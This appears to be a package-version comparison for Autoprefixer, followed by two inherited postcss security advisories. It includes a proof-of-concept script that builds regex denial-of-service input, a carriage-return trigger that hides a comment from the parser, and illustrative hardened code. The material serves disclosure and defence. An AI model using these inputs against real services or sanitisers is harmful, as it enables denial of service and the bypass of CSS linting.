Autoprefixer is a tool for web developers that automatically adds vendor prefixes to CSS rules, using browser-support data from the Can I Use website to decide which prefixes are still needed. Comparing versions 1.1.20140521 and 1.1.20140512 shows incremental updates confined to development dependencies. The only differences are newer versions of three development tools: mocha (testing framework) moves from 1.18.2 to 1.19.0, stylus (CSS preprocessor) from 0.45.0 to 0.45.1, and browserify (JavaScript module bundler) from 4.1.2 to 4.1.5. These are minor and patch releases of the project's own test, preprocessing and bundling tooling.
For developers using Autoprefixer, these changes have no effect on the published package: development dependencies are used to test and build the plugin and are not installed by consumers. The core functionality, parsing CSS and adding vendor prefixes, is identical between the two versions, and the runtime dependencies, postcss and fs-extra, are unchanged, so CSS processing and file-system behaviour are the same. For the same reason, the vulnerability exposure of a project that installs either version is identical: any issue listed below comes from the unchanged postcss dependency and applies to both versions equally. Upgrading to 1.1.20140521 is therefore low-risk but also brings no security benefit by itself.
All vulnerabilities affecting version 1.1.20140521 of the package (both are inherited from the postcss dependency)
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, and in versions from 8.0.0 up to but not including 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. Autoprefixer 1.1.20140521 pins a postcss release far older than either fixed line, which is why the issue is listed here. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a stylesheet with n source-map annotation openers and no closing "*/",
// so the annotation regex must backtrack through the whole input.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!"
}

// Warm-up parse of a benign, well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse increasingly long attack strings and report how long each takes;
// the time grows much faster than the input length.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now()
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
        } catch (e) {
            var time_cost = Date.now() - time
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
        }
    }
}
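The proof of concept above needs postcss installed and only shows the slowdown. The following is an added example, not the advisory's PoC and not postcss's source: it pairs a regex built around the quoted sub-pattern with a linear-time scanner that extracts the same annotation without unbounded backtracking, and times both on the PoC's input shape. The exact regex, the "#" after "/*" and the trailing "\s*\*\/" are assumptions taken from the PoC's input, not from postcss; the attack string is constructed in the same shape as build_attack() above.

```javascript
// Added example, not postcss's code. VULNERABLE_RE is an illustrative regex
// built around the advisory's sub-pattern; its exact shape is an assumption.
const VULNERABLE_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

// Vulnerable: for every "/*# sourceMappingURL=" start position, the greedy
// (.*) runs to the end of the input and then backtracks one character at a
// time looking for "\s*\*\/". With n openers and no "*/" that is O(n^2) work.
function findAnnotationRegex(css) {
  const m = VULNERABLE_RE.exec(css);
  return m ? m[1].trim() : null;
}

// Hardened: walk the input comment by comment with indexOf(). Every character
// is examined a bounded number of times, and an unterminated comment ends the
// scan instead of being retried from every later position.
function findAnnotationLinear(css) {
  const marker = '# sourceMappingURL=';
  let pos = 0;
  for (;;) {
    const open = css.indexOf('/*', pos);
    if (open === -1) return null;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) return null;            // unterminated comment: nothing to find
    const body = css.slice(open + 2, close).trim();
    if (body.startsWith(marker)) {
      return body.slice(marker.length).trim(); // first annotation, like the regex
    }
    pos = close + 2;
  }
}

// Constructed input in the shape of the advisory's PoC: n openers, no "*/".
function buildAttack(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

function timeIt(fn, input) {
  const t0 = Date.now();
  const result = fn(input);
  return { result, ms: Date.now() - t0 };
}

// Demo: doubling n roughly quadruples the regex time; the scanner stays flat.
for (const n of [500, 1000, 2000]) {
  const input = buildAttack(n);
  const slow = timeIt(findAnnotationRegex, input);
  const fast = timeIt(findAnnotationLinear, input);
  console.log(`n=${n} len=${input.length} regex=${slow.ms}ms linear=${fast.ms}ms`);
}
```

Both functions return the same annotation for a well-formed comment such as a{}/*# sourceMappingURL=a.css.map */, and both return null for the attack input; the difference is only in how much work the null answer costs. The general fix for this class of bug is the same as here: replace a pattern with an unbounded quantifier followed by an optional or repeatable tail by an explicit scan whose cursor only ever moves forward.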
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment. The practical consequence is that a linter or sanitiser that relies on PostCSS's view of where comments begin and end can pass content that a browser will interpret differently; the trigger depends on a bare carriage return (\r) rather than a newline (\n), so normalising line endings before parsing, and upgrading postcss, are the two available mitigations.
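To make the "\r discrepancy" concrete, here is an added example that is not postcss's tokenizer and not from the advisory: a deliberately small tokenizer with a "simple brackets" shortcut of the kind a CSS tokenizer might use to swallow a parenthesised value in one step. The shortcut regexes and the tokenizer itself are assumptions made for illustration. The fact the example turns on is certain: in a JavaScript regex, "." matches neither "\n" nor "\r", so a check shaped like /.[delimiters]/ cannot see a delimiter that directly follows a carriage return unless "\r" is itself listed in the class. The input is the trigger quoted in the advisory with a real carriage return.

```javascript
// Added example, not postcss's code. The two "bad bracket" checks are an
// assumption for illustration: they decide whether "(...)" may be taken as one
// value token or must be scanned character by character.
const BAD_BRACKET_NL_ONLY = /.[\n"'(/\\]/;   // only "\n" counts as a line break
const BAD_BRACKET_FIXED = /.[\r\n"'(/\\]/;   // "\r" counts as well

const PUNCT = new Set(['{', '}', ';', ':', ')']);

// Tokenize css into [type, text] pairs.
function tokenize(css, badBracket) {
  const tokens = [];
  let pos = 0;
  while (pos < css.length) {
    const ch = css[pos];
    if (ch === '/' && css[pos + 1] === '*') {
      // Comment: runs to "*/" or, if unterminated, to the end of the input,
      // which is how a browser treats an unterminated comment.
      const end = css.indexOf('*/', pos + 2);
      const stop = end === -1 ? css.length : end + 2;
      tokens.push(['comment', css.slice(pos, stop)]);
      pos = stop;
    } else if (ch === '(') {
      const close = css.indexOf(')', pos + 1);
      const content = css.slice(pos, close + 1);
      if (close !== -1 && !badBracket.test(content)) {
        tokens.push(['brackets', content]);   // whole "(...)" taken as one value
        pos = close + 1;
      } else {
        tokens.push(['(', '(']);              // scan the contents normally
        pos += 1;
      }
    } else if (PUNCT.has(ch)) {
      tokens.push([ch, ch]);
      pos += 1;
    } else if (/\s/.test(ch)) {
      pos += 1;                               // whitespace, including "\r", is skipped
    } else {
      let end = pos + 1;
      while (end < css.length && !/[\s(){};:]/.test(css[end]) &&
             !(css[end] === '/' && css[end + 1] === '*')) end++;
      tokens.push(['word', css.slice(pos, end)]);
      pos = end;
    }
  }
  return tokens;
}

// Everything a consumer would re-emit as CSS, i.e. all non-comment tokens.
function nonCommentText(css, badBracket) {
  return tokenize(css, badBracket)
    .filter(([type]) => type !== 'comment')
    .map(([, text]) => text)
    .join('');
}

// True when a non-comment token carries a comment opener: this tokenizer and a
// browser then disagree about where the comment starts.
function leaksCommentOpener(css, badBracket) {
  return nonCommentText(css, badBracket).includes('/*');
}

// Constructed input: the advisory's trigger with a literal carriage return.
const TRIGGER = '@font-face{ font:(\r/*);}';

console.log('\\n-only check:', JSON.stringify(nonCommentText(TRIGGER, BAD_BRACKET_NL_ONLY)));
console.log('fixed check  :', JSON.stringify(nonCommentText(TRIGGER, BAD_BRACKET_FIXED)));
```

With the "\n"-only check, the content "(\r/*)" passes the shortcut because no character that "." can match is followed by a listed delimiter, so "/*" ends up inside a value token and would be written back out as CSS, while a browser starts a comment there. With "\r" in the class, the shortcut is refused, the carriage return is skipped as whitespace and "/*" opens a comment that runs to the end of the input, matching the browser. Replacing "\r" by "\n" in the trigger makes both checks agree, which is exactly the line-ending sensitivity the advisory describes.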